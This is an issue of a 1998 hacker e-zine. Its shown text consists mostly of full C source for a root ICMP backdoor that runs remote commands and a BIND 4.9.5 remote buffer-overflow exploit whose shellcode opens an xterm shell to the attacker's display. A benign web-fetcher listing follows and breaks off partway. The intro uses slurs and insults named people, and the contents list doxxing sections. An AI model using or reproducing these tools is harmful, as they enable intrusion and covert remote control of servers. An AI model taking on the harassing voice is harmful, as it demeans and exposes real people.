home *** CD-ROM | disk | FTP | other *** search
/ Hackers Handbook - Millenium Edition / Hackers Handbook.iso / magazines / crh / crh009.txt < prev    next >
Encoding:
Text File  |  1998-07-23  |  57.7 KB  |  1,804 lines

  1. ──────────────────────────────────────────────────────────────────────────────
  2.         . [cZo] .          Team CodeZero Presents            . [cZo] .
  3. ──────────────────────────────────────────────────────────────────────────────
  4.  
  5.              `~Y$$$$s,             `~~Y$$$$$s,         ;
  6.      ,ss$$$$$: :$$$$$$$s,   ,ss$$$$P'  :$$$$$$$$s,,sss$$:    `YSss,
  7.     :$$$$$$$:  ,$$$$$$$P"':$$$$$$$:    ,$$$$$$$$$:$$$$$$$      :$$$$$s,
  8.     $$$$$$$$  `~~~Y$P"    $$$$$$$$ ,ss$$$$$$$P"' :$$$$$$$ssssss $$$$$$$$
  9.    :$$$$$$$            ,s:$$$$$$$: `~'YSss,       $$$$$$$$    `~Y$$$$$$$:
  10.    $$$$$$$$    :$$$$$$$P'$$$$$$$$     :$$$$$$$s, :$$$$$$$$:     :$$$$$$$$
  11.  `~Y$$$$$$:     :$$$$$$$s;$$$$$$$:    $$$$$$$$$P"'$$$$$$$$$    ,$$$$$$$$$:
  12.       `~~Y$$s,,s$$$$$$P' $$$$$$$$$s, :$$$$$P'     :$$$$$$$$$s,    `~~Y$$$$$s,
  13.               `$P"'       :P"'       $P'         ,s$$P"'
  14.                :                    `~s,  <mydknight>
  15.  
  16. ──────────────────────────────────────────────────────────────────────────────
  17.                                                                       Issue 9
  18.                                                                 11th May 1998
  19. ───────────────────────────────────────────────────────────────────────────────
  20.  
  21.  
  22.               Man with the plan :  so1o
  23.  
  24.                       The usual :  om3n, zer0x, xFli, electro,
  25.                                    spheroid, el8, ultima, chameleon.
  26.  
  27.                   Not forgotten :  loss, organik, peenut, pzn, suid
  28.                                    helix, deprave, manly, Shok.
  29.  
  30.                          Others :  paladine, Sciri, fiji, ch-E-ztic,
  31.                                    vacuum, humble.
  32.  
  33.                          Cheers :  Darkcyde, Jf.
  34.  
  35.                        Russians :  lirik, DemiGod, stranger, ps.
  36.  
  37.                          Rhino9 :  www.rhino9.org
  38.  
  39.  
  40.                      .-----------[ An Official ]-----------.
  41.                      :      .-----.  .----.   .--.--.      :
  42.                      :      :  .--'  : .-. :  :  :  :      :
  43.                      !_-::  :  :     : `-' ;  :  .  :  ::-_!
  44.                      :~-::  :: :     :: . :   ::    :  ::-~:
  45.                      :      ::.`--.  ::.:  :  ::.:  :      :
  46.                      :      `-----'  `--'--'  `--'--'      :
  47.                      !_-::                             ::-_!
  48.                      :~-::-[ Confidence Remains High ]-::-~:
  49.                      :~-::                             ::-~:
  50.                      `-----------[ Production ]------------'
  51.  
  52.  
  53. ───────────────────────────────────────────────────────────────────────────────
  54.   In This (compact) Installment of Confidence Remains High : 
  55. ───────────────────────────────────────────────────────────────────────────────
  56.  
  57. ------=>  Section A  :  Introduction And Cover Story.
  58.  
  59.     1. Confidence Remains High issue 9....................: Tetsu Khan
  60.  
  61. ------=>  Section B  :  Exploits And Code.
  62.  
  63.     1. ICMP backdoor client and server....................: BiT
  64.     2. BIND 4.9.5 remote..................................: prym
  65.     3. flea.c.............................................: SrfRoG
  66.     4. Dillons Linux crond exploit........................: BM V
  67.     5. KDE klock local exploit............................: someone on bugtraq
  68.  
  69. ------=>  Section C  :  Phones / Scanning / Radio.
  70.  
  71.     1. Wardialing in the UK...............................: Jf
  72.  
  73. ------=>  Section D  :  Miscellaneous (aka. d0x)
  74.  
  75.     1. p0sse.rolodex (mad outdated anyway)................: juurigaveitout
  76.     2. RLoxley, first class fuckwit (and fatboy)..........: WH0 GN0Z?
  77.     3. Carolyn Meinel d0x.................................: savec0re
  78.  
  79. ------=>  Section E  :  World News.
  80.  
  81.     1. MOD break DISN.....................................: JP
  82.  
  83. ------=> Section G  :  FIN.
  84.  
  85. ───────────────────────────────────────────────────────────────────────────────
  86. ===============================================================================
  87. ==[ INTRO ]====================[ .SECTION A. ]======================[ INTRO ]==
  88. ===============================================================================
  89. ───────────────────────────────────────────────────────────────────────────────
  90.   1. Confidence Remains High issue 9 : Tetsu Khan
  91. ───────────────────────────────────────────────────────────────────────────────
  92.  
  93. Blah blah blah, welcome to CRH009, you will find el8 0-day exploits and code,
  94. as well as some semi-interesting texts on a fag called RLoxley, a cl00le$$
  95. fuckwit called Carolyn Meinel, and some info on the MOD.. phear
  96.  
  97. The Distro List :
  98. =================
  99.  
  100.    152.7.11.38              /pub/personal/tattooman/confidence_remains_high/
  101.    ftp.sekurity.org         /users/so1o/
  102.    ftp.technotronic.com     /ezines/crh/
  103.    cybrids.simplenet.com    /Toast/files/CRH/
  104.    ftp.linuxwarez.com       /pub/crh/
  105.  
  106.  
  107. ───────────────────────────────────────────────────────────────────────────────
  108. ===============================================================================
  109. ==[ EXPLOITS / CODE ]==========[ .SECTION B. ]============[ EXPLOITS / CODE ]==
  110. ===============================================================================
  111. ───────────────────────────────────────────────────────────────────────────────
  112.   1. ICMP backdoor client and server : BiT
  113. ───────────────────────────────────────────────────────────────────────────────
  114.  
  115.  icmpd.c == server daemon
  116.  icmpc.c == client
  117.  
  118. <--icmpd.c-------------------------------------------------------------------->
  119.  
  120. #include <stdio.h>
  121. #include <stdlib.h>
  122. #include <sys/types.h>
  123. #include <sys/socket.h>
  124. #include <netinet/ip.h>
  125. #include <netinet/ip_icmp.h>
  126. #include <netinet/in.h>
  127. #include <unistd.h>
  128.  
  129. #define RID 31337
  130. #define LID 12345
  131. #define VER "0.3"
  132.  
  133. void start_pipe(char *buf,int len);
  134. void send_connect(unsigned long to, unsigned int id,char *data);
  135. u_short cksum(u_short *buf, int nwords);
  136.  
  137. void main()
  138. {
  139.   char buf[512];
  140.   struct iphdr *ip=(struct iphdr *)buf;
  141.   struct icmphdr *icmp=(struct icmphdr *)(buf+sizeof(struct iphdr));
  142.   int lsock,i;
  143.   printf("ICMP PIPE %s - DAEMON PART - BiT'97\n",VER);
  144.  
  145.   if(geteuid())
  146.     printf("User luser detected\n"),exit(-1);
  147.     lsock=socket(AF_INET,SOCK_RAW,1);
  148.     close(0);close(1);close(2);
  149.     if(fork())
  150.     exit(0);
  151.  
  152.   while(1)
  153.   {
  154.     i=read(lsock,buf,512);
  155.       if(ip->protocol == 1 && icmp->type == 0 && ntohs(icmp->un.echo.id) == RID)
  156.         start_pipe(buf,i);
  157.   }
  158. }
  159.  
  160. void start_pipe(char *buf,int len)
  161. {
  162.   char databuf[512];
  163.   FILE *haha;
  164.   struct iphdr *ip=(struct iphdr *)buf;
  165.   struct icmphdr *icmp=(struct icmphdr *)(buf+sizeof(struct iphdr));
  166.   int lsock,i;
  167.   char *p;
  168.   unsigned long int tmp;
  169.   struct sockaddr_in sa;
  170.  
  171.   lsock=socket(AF_INET,SOCK_RAW,1);
  172.   icmp->un.echo.id=ntohs(LID);
  173.   sa.sin_family=AF_INET;
  174.   sa.sin_addr.s_addr=ip->saddr;
  175.   sendto(lsock,icmp,len-sizeof(struct iphdr),0,(struct sockaddr *)&sa,sizeof(sa));
  176.  
  177.   /* connected */
  178.   while(1)
  179.   {
  180.     i=recv(lsock,buf,512,0);
  181.       if(ip->potocol == 1 && icmp->type == 0 && ntohs(icmp->un.echo.id) == RID) {
  182.         p=(buf+sizeof(struct iphdr)+sizeof(struct icmphdr));
  183.         memcpy(databuf,p,i-(sizeof(struct iphdr)+sizeof(struct icmphdr))+1);
  184.           if(strcasecmp(databuf,"exit") == 0)
  185.             return;
  186.               if((haha=popen(databuf,"r")) == NULL)
  187.                 send_connect(ip->saddr,LID,"Unknown command.\n");
  188.               else {
  189.                 i=0;
  190.                   while(fgets(databuf,512,haha) != NULL) {
  191.                     i++;
  192.                     send_connect(ip->saddr,LID,databuf);
  193.                   }
  194.                   if(!i)
  195.                     send_connect(ip->saddr,LID,"Unknown command.\n");
  196.                       pclose(haha);
  197.               }
  198.       }
  199.       fflush(stdout);fflush(stdin);
  200.   }
  201. }
  202.  
  203. void send_connect(unsigned long to, unsigned int id,char *data)
  204. {
  205.   char buf[512];
  206.   struct icmphdr *icmp = (struct icmphdr *)buf;
  207.   char *bla=(buf+sizeof(struct icmphdr));
  208.   struct sockaddr_in sa;
  209.   int i,sock;
  210.  
  211.   sock=socket(AF_INET,SOCK_RAW,1);
  212.   bzero(buf,512);
  213.   icmp->type=0;
  214.   icmp->un.echo.id=htons(id);
  215.   strcpy(bla,data);
  216.   icmp->checksum=cksum((u_short *)icmp,(9+strlen(data))>>1);
  217.   sa.sin_family=AF_INET;
  218.   sa.sin_addr.s_addr=to;
  219.   i=sendto(sock,buf,(9+strlen(data)),0,(struct sockaddr *)&sa,sizeof(sa));
  220.   close(sock);
  221. }
  222.  
  223. u_short cksum(u_short *buf, int nwords) {
  224.  
  225.   unsigned long sum;
  226.  
  227.   for ( sum = 0; nwords > 0; nwords -- )
  228.     sum += *buf++;
  229.     sum = ( sum >> 16) + ( sum & 0xffff );
  230.     sum += ( sum >> 16 );
  231.     return ~sum ;
  232. }
  233.  
  234. <--end of icmpd.c------------------------------------------------------------->
  235.  
  236.  
  237. <-icmpc.c--------------------------------------------------------------------->
  238.  
  239. #include <stdio.h>
  240. #include <stdlib.h>
  241. #include <sys/socket.h>
  242. #include <sys/types.h>
  243. #include <netinet/ip.h>
  244. #include <netinet/ip_icmp.h>
  245. #include <netinet/in.h>
  246. #include <unistd.h>
  247. #include <fcntl.h>
  248. #include <time.h>
  249. #include <netdb.h>
  250.  
  251. #define LID 12345
  252. #define VER "0.3"
  253.  
  254. unsigned int RID;
  255. unsigned long host,myip;
  256. int state=0;
  257. unsigned long int res(char *p);
  258. void send_connect(unsigned long to, unsigned int id,char *data);
  259. void get_string_and_send(void);
  260. void show_shit(char *buf);
  261. u_short cksum(u_short *buf, int nwords);
  262.  
  263. void main(int argc, char **argv)
  264. {
  265.   char buf[512];
  266.   struct iphdr *ip = (struct iphdr *)buf;
  267.   struct icmphdr *icmp = (struct icmphdr *)(buf+sizeof(struct iphdr));
  268.   int i,lsock;
  269.   fd_set f;
  270.   printf("ICMP PIPE %s - CLIENT PART - BiT'97\n",VER);
  271.     if(argc<3)
  272.       printf("%s <host> <rid>\n",*argv),exit(-1);
  273.         if(geteuid())
  274.           printf("User luser detected\n"),exit(-1);
  275.           host=res(argv[1]);
  276.           RID=atoi(argv[2]);
  277.           lsock=socket(AF_INET,SOCK_RAW,1);
  278.           send_connect(host,RID,"a");
  279.           stat e=1;
  280.   fcntl(lsock,F_SETFL,O_NONBLOCK);
  281.   fcntl(fileno(stdin),F_SETFL,O_NONBLOCK);
  282.  
  283.   while(1)
  284.   {
  285.     fflush(stdout);
  286.     fflush(stdin);
  287.     FD_ZERO(&f);
  288.     FD_SET(fileno(stdin),&f);
  289.     FD_SET(lsock,&f);
  290.       if(select(FD_SETSIZE,&f,NULL,NULL,NULL))
  291.         {
  292.         if(FD_ISSET(fileno(stdin),&f))
  293.           get_string_and_send();
  294.             if(FD_ISSET(lsock,&f)) {
  295.               i=read(lsock,buf,512);
  296.                 if(ip->protocol == 1 && icmp->type == 0 &&
  297.                            ntohs(icmp->un.echo.id) == LID) {
  298.                   if(state==2)
  299.                     show_shit(buf);
  300.                       if(state==1) {
  301.                         state++;
  302.                         printf("Connected.\n");
  303.                       }
  304.                       myip=ip->daddr;
  305.                  }
  306.             }
  307.       }
  308.   }
  309. }
  310.  
  311. unsigned long int res(char *p)
  312. {
  313.   struct hostent *h;
  314.   unsigned long int rv;
  315.  
  316.   h=gethostbyname(p);
  317.     if(h!=NULL)
  318.       memcpy(&rv,h->h_addr,h->h_length);
  319.     else
  320.       rv=inet_addr(p);
  321.       return rv;
  322. }
  323.  
  324. void send_connect(unsigned long to, unsigned int id,char *data)
  325. {
  326.   char buf[512];
  327.   struct icmphdr *icmp = (struct icmphdr *)buf;
  328.   char *bla=(buf+sizeof(struct icmphdr));
  329.   struct sockaddr_in sa;
  330.   int i,ssock;
  331.  
  332.   ssock=socket(AF_INET,SOCK_RAW,1);
  333.   bzero(buf,512);
  334.   icmp->type=0;
  335.   icmp->un.echo.id=htons(id);
  336.   strcpy(bla,data);
  337.   icmp->checksum=cksum((u_short *)icmp,(9+strlen(data))>>1);
  338.   sa.sin_family=AF_INET;
  339.   sa.sin_addr.s_addr=to;
  340.   i=sendto(ssock,buf,(9+strlen(data)),0,(struct sockaddr *)&sa,sizeof(sa));
  341.   close(ssock);
  342. }
  343.  
  344. void get_string_and_send(void)
  345. {
  346.   char buf[512];
  347.   bzero(buf,512);
  348.   read(0,buf,512);
  349.   buf[strlen(buf)-1]=0;
  350.   send_connect(host,RID,buf);
  351.     if(strcasecmp(buf,"exit") == 0)
  352.       exit(1);
  353. }
  354.  
  355. void show_shit(char *buf)
  356. {
  357.   printf((buf+sizeof(struct iphdr)+sizeof(struct icmphdr)));
  358. }
  359.  
  360. u_short cksum(u_short *buf, int nwords) {
  361.   unsigned long sum;
  362.     for ( sum = 0; nwords > 0; nwords -- )
  363.       sum += *buf++;
  364.       sum = ( sum >> 16) + ( sum & 0xffff );
  365.       sum += ( sum >> 16 );
  366.     return ~sum ;
  367. }
  368.  
  369. <--end of icmpc.c------------------------------------------------------------->
  370.  
  371. ───────────────────────────────────────────────────────────────────────────────
  372.   2. BIND 4.9.5 remote exploit : prym
  373. ───────────────────────────────────────────────────────────────────────────────
  374.  
  375. /*
  376.  * z, thnx.
  377.  * ganked the xterm exec from adm, thnx.
  378.  * have fun.
  379.  * -prym
  380.  */
  381.  
  382. #include <unistd.h>
  383. #include <stdio.h>
  384. #include <stdlib.h>
  385. #include <signal.h>
  386. #include <time.h>
  387. #include <string.h>
  388. #include <ctype.h>
  389. #include <sys/types.h>
  390. #include <sys/socket.h>
  391. #include <netinet/in.h>
  392. #include <arpa/inet.h>
  393. #include <arpa/nameser.h>
  394. #include <netdb.h>
  395.  
  396. #define REMOTE
  397. #define DEFAULT_ANBUF_OFFSET 300
  398. #define DEFAULT_TARGET 0
  399. #define DEFAULT_OPTIMIZED 0
  400. #define DLEN_VAL 4
  401. #define PRE_OF_DATALEN (1+(sizeof(short)*3)+sizeof(long))
  402. #define ALEN_VAL (DLEN_VAL+PRE_OF_DATALEN)
  403. #define EVILSPACE (PACKETSZ-PRE_OF_DATALEN)
  404. #define RET_FROM_1NOP (PACKETSZ+(MAXDNAME+3)+(sizeof(int)*6)+4-PRE_OF_DATALEN)
  405. #define OPT_RET_FROM_1NOP (PACKETSZ+(MAXDNAME+3)+4-PRE_OF_DATALEN)
  406.  
  407. struct target_type
  408. {
  409.   char desc[40];
  410.   int systype;
  411.   unsigned long addr;
  412.   unsigned long opt_addr;
  413. };
  414.  
  415. struct target_type target[] =
  416. {
  417.   {"x86 Linux 2.0.x named 4.9.5-P1",0,0xbfffef8c,0xbfffefb4},
  418.   {"x86 Linux 2.0.x named 4.9.6-REL",0,0xbffff188,0xbffff194},
  419.   {"x86 Linux 2.0.x named 8.1-REL",0,0xbffff3f0,0xbffff44c},
  420.   {"x86 Linux 2.0.x named 8.1.1",0,0xbffff404,0xbffff45c},
  421.   {"x86 Linux 2.0.x RH 4.2 named 4.9.5-P1",0,0,0xbfffeff8},
  422.   {{0},0,0,0}
  423. };
  424.  
  425. unsigned long resolve(char *host)
  426. {
  427.   long i;
  428.   struct hostent *he;
  429.  
  430.   if((i=inet_addr(host))<0)
  431.     if((he=gethostbyname(host))==NULL)
  432.       return(0);
  433.     else
  434.       return(*(unsigned long *)he->h_addr);
  435.  
  436.   return(i);
  437. }
  438.  
  439. int send_packet(int fd, char *buff, int len)
  440. {
  441.   char tmp[2], *ptr=tmp;
  442.  
  443.   PUTSHORT(len,ptr);
  444.   if(write(fd,tmp,2)!=2)
  445.     return(-1);
  446.  
  447.   if(write(fd,buff,len)!=len)
  448.     return(-1);
  449.  
  450.   return(1);
  451. }
  452.  
  453. int attack(int fd, struct in_addr us, struct target_type t,
  454.        unsigned long offset, int optimized)
  455. {
  456.   char buff[sizeof(HEADER)+PRE_OF_DATALEN+RET_FROM_1NOP+4], *ptr=buff;
  457.   HEADER *dnsh=(HEADER *)buff;
  458.   unsigned long i;
  459.   int dlen, len=0, al=ALEN_VAL, dl=DLEN_VAL;
  460.  
  461.   memset(dnsh,0,sizeof(HEADER));
  462.   dnsh->id = htons(31337);
  463.   dnsh->opcode = IQUERY;
  464.   dnsh->rd = 1;
  465.   dnsh->ra = 1;
  466.   dnsh->ancount = htons(1);
  467.   ptr += sizeof(HEADER);
  468.   len += sizeof(HEADER);
  469.  
  470.   *ptr = '\0';
  471.   ptr++;
  472.   PUTSHORT(T_A,ptr);
  473.   PUTSHORT(C_IN,ptr);
  474.   PUTLONG(31337,ptr);
  475.   dlen = (optimized?OPT_RET_FROM_1NOP:RET_FROM_1NOP)+4;
  476.   PUTSHORT(dlen,ptr);
  477.   len += PRE_OF_DATALEN;
  478.  
  479.   memset(ptr,'X',(sizeof(buff)-(ptr-buff)));
  480.  
  481.   if(t.systype==0)
  482.     {
  483. #ifdef REMOTE
  484.       char c1[] =
  485.     "\xeb\x2f\x5f\xeb\x4a\x5e\x89\xfb\x89\x3e\x89\xf2\xb0\xfe\xae\x74"
  486.     "\x14\x46\x46\x46\x46\x4f\x31\xc9\x49\xb0\xff\xf2\xae\x30\xc0\x4f"
  487.     "\xaa\x89\x3e\xeb\xe7\x31\xc0\x89\x06\x89\xd1\x31\xd2\xb0\x0b\xcd"
  488.     "\x80\xe8\xcc\xff\xff\xff";
  489.       char c2[] =
  490.     "/usr/bin/X11/xterm\xff-display\xff";
  491.       char c3[32];
  492.       char c4[] =
  493.     "\xfe\xe8\xb1\xff\xff\xff";
  494.  
  495.       snprintf(c3,sizeof(c3),"%s:0\xff-e\xff/bin/sh\xff",inet_ntoa(us));
  496.  
  497.       c1[4] = (unsigned char)0x32+strlen(c2)+strlen(c3);
  498.       c4[2] = (unsigned char)0xc9-strlen(c2)-strlen(c3);
  499.  
  500.       i = EVILSPACE-strlen(c1)-strlen(c2)-strlen(c3)-strlen(c4);
  501.  
  502.       memset(ptr,0x90,i);
  503.       memcpy((ptr+i),c1,strlen(c1));
  504.       memcpy((ptr+i+strlen(c1)),c2,strlen(c2));
  505.       memcpy((ptr+i+strlen(c1)+strlen(c2)),c3,strlen(c3));
  506.       memcpy((ptr+i+strlen(c1)+strlen(c2)+strlen(c3)),c4,strlen(c4));
  507. #else
  508.       char c0de[] =
  509.         "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
  510.         "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
  511.         "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/tmp/hi";
  512.       int i = EVILSPACE-strlen(c0de);
  513.  
  514.       memset(ptr,0x90,i);
  515.       memcpy((ptr+i),c0de,strlen(c0de));
  516. #endif
  517.     }
  518.   else
  519.     return(0);
  520.  
  521.   if(!optimized)
  522.     {
  523.       memcpy((ptr+(dlen-16)),&al,sizeof(al));
  524.       memcpy((ptr+(dlen-12)),&dl,sizeof(dl));
  525.     }
  526.  
  527.   i = (optimized?t.opt_addr:t.addr)+offset;
  528.   memcpy((ptr+(dlen-4)),&i,sizeof(i));
  529.   len += dlen;
  530.  
  531.   return(send_packet(fd,buff,len));
  532. }
  533.  
  534. int main(int argc, char *argv[])
  535. {
  536.   unsigned long offset=DEFAULT_ANBUF_OFFSET;
  537.   int target_index=DEFAULT_TARGET, optimized=DEFAULT_OPTIMIZED, sock, i;
  538.   struct sockaddr_in sa;
  539.   struct in_addr xs;
  540.  
  541.   for(i=0;target[i].desc[0];i++);
  542.  
  543.   if(argc<3)
  544.     {
  545.       fprintf(stderr,"\ntarget types:\n");
  546.       fprintf(stderr," %-2s : %-12s - %-12s - %s\n","tt","anbuf","opt anbuf",
  547.           "description");
  548.       for(target_index=0;target_index<i;target_index++)
  549.     fprintf(stderr," %-2d : 0x%-10x - 0x%-10x - %s\n",target_index,
  550.         (unsigned int)target[target_index].addr,
  551.         (unsigned int)target[target_index].opt_addr,
  552.         target[target_index].desc);
  553.       fprintf(stderr,
  554.           "\nerror: usage: %s <target> <X server> [tt] [opt] [offset]\n",
  555.           argv[0]);
  556.       exit(-1);
  557.     }
  558.  
  559.   if((argc>3)&&((target_index=atoi(argv[3]))>=i))
  560.     {
  561.       fprintf(stderr,"error: invalid target type %d\n",target_index);
  562.       exit(-1);
  563.     }
  564.  
  565.   if((target[target_index].addr==0)&&(target[target_index].opt_addr==0))
  566.     {
  567.       fprintf(stderr,"error: internal error\n");
  568.       exit(-1);
  569.     }
  570.  
  571.   if(argc>4)
  572.     {
  573.       optimized = atoi(argv[4]);
  574.       if((optimized!=0)&&(optimized!=1))
  575.     {
  576.       fprintf(stderr,"error: invalid optimization setting %d\n",optimized);
  577.       exit(-1);
  578.     }
  579.     }
  580.  
  581.   if((optimized==0)&&(target[target_index].addr==0))
  582.     optimized = 1;
  583.  
  584.   if((optimized==1)&&(target[target_index].opt_addr==0))
  585.     optimized = 0;
  586.  
  587.   if(argc>5)
  588.     offset = atoi(argv[5]);
  589.  
  590.   if(!(xs.s_addr=resolve(argv[2])))
  591.     {
  592.       fprintf(stderr,"error: can not resolve: %s\n",argv[2]);
  593.       exit(-1);
  594.     }
  595.  
  596.   if(!(sa.sin_addr.s_addr=resolve(argv[1])))
  597.     {
  598.       fprintf(stderr,"error: can not resolve: %s\n",argv[1]);
  599.       exit(-1);
  600.     }
  601.  
  602.   sa.sin_family = AF_INET;
  603.   sa.sin_port = htons(53);
  604.  
  605.   if((sock=socket(sa.sin_family,SOCK_STREAM,IPPROTO_TCP))==(-1))
  606.     {
  607.       perror("error: socket");
  608.       exit(-1);
  609.     }
  610.  
  611.   if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))==(-1))
  612.     {
  613.       perror("error: connect");
  614.       exit(-1);
  615.     }
  616.  
  617.   printf("target             : %s\n",inet_ntoa(sa.sin_addr));
  618.   printf("target type        : %s\n",target[target_index].desc);
  619.   printf("optimized named    : %s\n",(optimized?"YES":"NO"));
  620.   printf("anbuff addr        : 0x%x\n",(unsigned int)
  621.      (optimized?target[target_index].opt_addr:target[target_index].addr));
  622.   printf("anbuff addr offset : %lu\n",offset);
  623.   printf("xterm display dest : %s:0\n",inet_ntoa(xs));
  624.   printf("exploiting . . .\n");
  625.  
  626.   switch(attack(sock,xs,target[target_index],offset,optimized))
  627.     {
  628.     case -1:
  629.       perror("error: attack");
  630.       return(-1);
  631.       break;
  632.  
  633.     case 0:
  634.       fprintf(stderr,"error: internal error\n");
  635.       return(-1);
  636.       break;
  637.     }
  638.  
  639.   if(close(sock)!=0)
  640.     {
  641.       perror("error: close");
  642.       return(-1);
  643.     }
  644.  
  645.   exit(0);
  646. }
  647.  
  648. ───────────────────────────────────────────────────────────────────────────────
  649.   3. flea.c : SrfRoG
  650. ───────────────────────────────────────────────────────────────────────────────
  651.  
  652. /*
  653.  * flea.c : fetch stuff from the Web without launching a browser.
  654.  *
  655.  * This program is free software; you can redistribute it and/or modify
  656.  * it under the terms of the GNU General Public License as published by
  657.  * the Free Software Foundation; either version 2 of the License, or
  658.  * (at your option) any later version.
  659.  *
  660.  * This program is distributed in the hope that it will be useful,
  661.  * but WITHOUT ANY WARRANTY; without even the implied warranty of
  662.  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  663.  * GNU General Public License for more details.
  664.  *
  665.  * You should have received a copy of the GNU General Public License
  666.  * along with this program; if not, write to the Free Software
  667.  * Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  668.  *
  669.  */
  670.  
  671. /*
  672.  * TODO:
  673.  *
  674.  *  1) Use threads for multiple gets.
  675.  *  2) More file options.
  676.  *  3) Better output display.
  677.  *  4) Configuration file.
  678.  *  5) Host cache'ing.
  679.  *  6) HTTP/1.1 Message parsing / compliance.
  680.  *  7) MIME types handling.
  681.  *
  682.  * Email comments / suggestions to srfrog@nema.com
  683.  *
  684.  */
  685.  
  686. #include <stdio.h>
  687. #include <stdlib.h>
  688. #include <stdarg.h>
  689. #include <fcntl.h>
  690. #include <unistd.h>
  691. #include <errno.h>
  692. #include <time.h>
  693. #include <netdb.h>
  694. #include <string.h>
  695. #include <netinet/in.h>
  696. #include <sys/time.h>
  697. #include <sys/types.h>
  698.  
  699. #ifndef TRUE
  700. #define TRUE     1
  701. #define FALSE    0
  702. #endif
  703.  
  704. #define    m_isalpha(x) (((x) >= 'a' && (x) <= 'z') || ((x) >= 'A' && (x) <= 'Z'))
  705. #define    m_isdigit(x) ((x) >= '0' && (x) <= '9')
  706. #define    m_isspace(x) ((x) == ' ' || (x) == '\f' || (x) == '\n' || (x) == '\r' || (x) == '\t' || (x) == '\v')
  707.  
  708. #define MAXLEN 512
  709. #define WIDTH 79
  710. #define VERSION "0.9"
  711.  
  712. unsigned int serv_port(char);
  713.  
  714. /* Some variables used */
  715. static  int     nofetchfile = FALSE;
  716. static    char    *pn = (char *)0;
  717.  
  718. typedef    struct    url_entry
  719. {
  720.     char    *hostname;
  721.     unsigned int port;
  722.     char    *path;
  723.     char    *file;
  724. } URL;
  725.  
  726. static  void status(char *fmt, ...)
  727. {
  728.     va_list msg;
  729.     char buf[MAXLEN], *p = buf, c;
  730.     int len;
  731. static    int old_len = 0;
  732.  
  733.     va_start(msg, fmt);
  734.     vsprintf(buf, fmt, msg);
  735.     va_end(msg);
  736.  
  737.     len = strlen(buf) - 1;
  738.     c = buf[len];
  739.     write(1, p, len);
  740.  
  741.     if (old_len > len) {
  742.         int i, j;
  743.         char k = ' ';
  744.  
  745.         for (i=0, j=(old_len - len); j > i; ++i)
  746.             write(1, &k, 1);
  747.         write(1, &c, 1);
  748.         return;
  749.     }
  750.     old_len = len;
  751.     write(1, &c, 1);
  752. }
  753.  
  754. static    int strcount(s, c)
  755.     char *s, c;
  756. {
  757.     int     index=0, count=0;
  758.  
  759.     while (s[index] != '\0')
  760.     {
  761.         if (s[index] == c)
  762.             count++;
  763.         index++;
  764.     }
  765.     return(count);
  766. }
  767.  
  768. static    URL strip_url(url)
  769.     char *url;
  770. {
  771.     int    i, idx=0, skip=0;
  772.     char    tmp[MAXLEN*2], *p = tmp;
  773.     URL    u;
  774.  
  775.     if (0 == strncmp(url,"http://",7))
  776.         idx = 7;
  777.     for (i=0; (url[idx]!=':' && url[idx]!='/' && url[idx]!='\0'); i++,idx++)
  778.         tmp[i] = url[idx];
  779.     if (i == 0)
  780.         return (u);
  781.     tmp[i] = 0;
  782.     u.hostname = strdup(p);
  783.  
  784.     if (url[idx] == ':') {
  785.         ++idx;
  786.         for (i=0; m_isdigit(url[idx]); i++,idx++)
  787.             tmp[i] = url[idx];
  788.         tmp[i] = 0;
  789.         u.port = (unsigned int) atoi(p);
  790.     } else
  791.         u.port = 80;
  792.  
  793.     skip = strcount(&url[idx], '/');
  794.     for (i=0; skip > 0; i++,idx++)
  795.     {
  796.         tmp[i] = url[idx];
  797.         if (url[idx]=='/')
  798.             skip--;
  799.     }
  800.     tmp[i] = 0;
  801.     u.path = strdup(p);
  802.  
  803.     for (i=0; url[idx]!='\0'; i++,idx++)
  804.         tmp[i] = url[idx];
  805.     tmp[i]=0;
  806.     u.file = strdup(p);
  807.  
  808.     if (i == 0) {
  809.         nofetchfile = TRUE;
  810.         strcpy(p,"flea.dump");
  811.         u.file = strdup(p);
  812.     }
  813.     return (u);
  814. }
  815.  
  816. static    int connect_url(u)
  817.     URL    u;
  818. {
  819.     struct hostent *host;
  820.     struct sockaddr_in sin;
  821.     int s = -1;
  822.  
  823.     if ((host = gethostbyname(u.hostname)) == NULL) {
  824.         perror(pn);
  825.         return(-1);
  826.     }
  827.     if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
  828.         perror(pn);
  829.         return(-2);
  830.     }
  831.     sin.sin_family = AF_INET;
  832.     sin.sin_port = htons(u.port);
  833.     bcopy(host->h_addr, &sin.sin_addr, host->h_length);
  834.  
  835.     printf("Connecting to remote host %s:%u\n", u.hostname, u.port);
  836.     if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
  837.         perror(pn);
  838.         close(s);
  839.         return(-3);
  840.     }
  841.     return (s);
  842. }
  843.  
  844. static    void process_file(fdw, fdr, u)
  845.     int fdw, fdr;
  846.     URL *u;
  847. {
  848.     time_t start = 0L, end = 0L;
  849.     int n, m, bytes=0;
  850.     float x=0.0;
  851.     char buffer[MAXLEN+1], *p = buffer;
  852.  
  853.     time(&start);
  854.     while (1) {
  855.         n = read(fdr, p, MAXLEN);
  856.         switch (n) {
  857.         case -1:
  858.             status("%s: Read error: %s\n", u->file, strerror(errno));
  859.             break;
  860.         case 0:
  861.             time(&end);
  862.             n = (int)(end - start) + 1;
  863.             x = (float)bytes / (float)n;
  864.             x /= 1024.0;
  865.             status("%s: Received %d bytes in %d sec%s (%.3f kb/s)\n",
  866.                 u->file, bytes, n, (n == 1) ? "" : "s", x);
  867.             break;
  868.         default:
  869.             m = write(fdw, p, n);
  870.             if (m > 0) {
  871.                 bytes += m;
  872.                 status("%s: Writing: %d bytes\r", u->file, bytes);
  873.                 continue;
  874.             }
  875.             status("%s: Write error: %s\n", u->file, strerror(errno));
  876.             break;
  877.         }
  878.         break;
  879.     }
  880.     close(fdw);
  881.     close(fdr);
  882. }
  883.  
  884. static    void launch_fetcher(url)
  885.     char *url;
  886. {
  887.     int    sock = -1, i, j,
  888.         outfd = -1;
  889.     URL    u;
  890.     char    tmp[MAXLEN*2];
  891.  
  892.     /* sanity */
  893.     if (!url)
  894.         return;
  895.  
  896.     u = strip_url(url);
